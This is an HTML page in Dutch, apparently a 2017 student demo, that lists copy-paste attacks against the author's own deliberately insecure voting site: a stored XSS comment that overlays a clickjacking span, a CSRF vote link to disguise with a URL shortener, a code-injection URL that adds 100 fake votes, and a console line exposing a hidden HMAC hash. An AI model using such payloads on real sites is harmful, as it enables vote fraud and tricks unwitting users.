<!doctype HTML>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <title>script kiddie's toolkit</title>
        <link rel=stylesheet href="css/hacks.css">
    </head>
    <body>
        <header>
            <h1>"Hacks"</h1>
        </header>
        <main>
            <article>
                <p>Op deze pagina staan de manieren waarop de ontzettend onveilige website geexploit kan worden.</p>
            </article>
            <article>
                <h2>XSS</h2>
                <p><i>Cross Site Scripting</i></p>
                <!--img src="http://i.telegraph.co.uk/multimedia/archive/01291/wink-putin_1291535b.jpg" alt="Putin winking"-->
                <span>
                    <h3>dom</h3>
                    <p>Hieronder is een voorbeeld van een persistent dom attack. Het script injecteerd een doorzichtig span element dat zich over het bovenste deel van de pagina bevind. Wanneer een onwetende gebruiker op het element klikt zal hij automatisch voor trump stemmen.</br><i>Kopier de text naar de comment sectie op de pagina en klik op "Post Comment"</i></p>
                    <textarea onClick="this.setSelectionRange(0, this.value.length)" rows="5">Is nice site you have here, secure and all :^) &#60span style="position:absolute;top:0;left:0;height:250vh;background-color:rgba(0 0 0 0);width:100vw;z-index:101;"onclick="document.getElementById(0).checked = true;document.forms[0].submit();">&#60/span></textarea>
                    <p>Klik op "reset database" (rechtsonder) om de pagina terug bruikbaar te maken.</p>
                </span>
                <span>
                    <h3>xsrf</h3>
                    <p>Deze "hack" stuur je door naar een onwetend persoon, bij voorkeur vermomd met een url-shortener. Omdat de website niet checked op een xsrf token zal deze automatisch op trump stemmen als hij de link opent.</p>
                    <a href="elect.html?candidate=0">users.telenet.be/alek/elect?candidate=0</a>
                </span>
                <span>
                    <h3>RS</h3>
                    <p>WIP. Het idee is dat je een link naar een redirect op de pagina zo manipuleert dat er twee headers worden teruggestuurt, waarvan 1 jouw eigen dat de malicious code bevat.</p>
                    <textarea onClick="this.setSelectionRange(0, this.value.length)" rows="5">Do not of mind me.<script></script></textarea>
                </span>
                <!--img src="http://i0.kym-cdn.com/photos/images/original/001/199/570/497.png" alt="Putin hackerman"-->
            </article>
            <article>
                <h2>(no)SQL Injection</h2>
                <span>
                    <p><i>(no)SQL Injection</i> - Met deze hack manipuleren we een gewone database input dat niet gefilterd word zodat we onze eigen queries erop kunnen uitvoeren. De onderstaande methode voert eerst een delete uit zoals bedoeld, maar wordt daarna geescaped zodat we een stukje code kunnen runnen dat een hoop random votes genereerd voor Trump.</br>Kopier de text naar de adres bar.</i></p>
                    <textarea onClick="this.setSelectionRange(0, this.value.length)" rows="5">users.telenet.be/alek/elect.html?delete=-1);let%20person={vote:0};for(let%20i=0;i<100;i++){person.ip=Math.floor((Math.random()*10000)+1);let%20req=db.transaction('users','readwrite').objectStore('users').add(person);req.onerror=function(){i--;};}location.replace('elect.html'</textarea>
                </span>
            </article>
            <article>
                <span>
                    <p>Op de site, <i>nadat je minstens een keer gepost of gevote hebt</i>, staat er een hidden input met de naam hash. Deze fungeert als HMAC. De hash word op de server vergeleken met een hash van de opgeslagen gebruiker met wiens naam je probeert te posten. Het idee in dit geval is dat je op deze manier je naam niet zomaar kan veranderen of je voor iemand anders uitgeven.</br></br><i>Om de hashcode te bekijken kan je de onderstaande lijn uitvoeren in de developer console (F12).</i></p>
                    <textarea onClick="this.setSelectionRange(0, this.value.length)" rows="5">alert(document.getElementById('hash').value);</textarea>
                </span>
            </article>
        </main>
        <footer>
            <!--img src="https://qph.ec.quoracdn.net/main-qimg-bed1d7db38896608fbd8873b46afd648-c" alt="Putin riding a bear"-->
            <address>Alek 2017</address>
        </footer>
    </body>
</html>